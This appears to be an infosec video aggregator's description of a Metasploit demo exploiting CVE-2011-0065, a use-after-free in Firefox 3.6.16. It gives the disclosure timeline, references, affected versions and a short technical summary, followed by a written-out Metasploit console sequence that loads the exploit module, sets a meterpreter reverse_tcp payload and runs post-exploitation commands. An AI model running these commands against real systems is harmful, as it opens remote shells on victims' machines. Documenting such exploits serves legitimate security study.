Description: Timeline :
Vulnerability discovered by regenrecht and submitted to ZDI
Initial ZDI vulnerability notification to vendor the 2011-02-17
Coordinated public release of the vulnerability the 2011-04-28
Metasploit PoC provided the 2011-08-10
PoC provided by:
regenrecht
Rh0
Reference(s) :
CVE-2011-0065
OSVDB-72085
MFSA2011-13
ZDI-11-158
Affected versions :
Mozilla Firefox prior to version 3.6.17
Mozilla Firefox prior to version 3.5.19
SeaMonkey before version 2.0.14
Tested on Windows XP SP3 with Mozilla Firefox 3.6.16
Description :
This module exploits an use after free vulnerability in Mozilla Firefox 3.6.16. An OBJECT Element mChannel can be freed via the OnChannelRedirect method of the nsIChannelEventSink Interface. mChannel becomes a dangling pointer and can be reused when setting the OBJECTs data attribute. (Discovered by regenrecht). This module uses heapspray with a minimal ROP chain to bypass DEP on Windows XP SP3.
Metasploit demo :
use exploit/windows/browser/mozilla_mchannel
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
sessions -i 1
getuid
sysinfo
ipconfig
Tags: Mozilla , Firefox , Metasploit ,
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.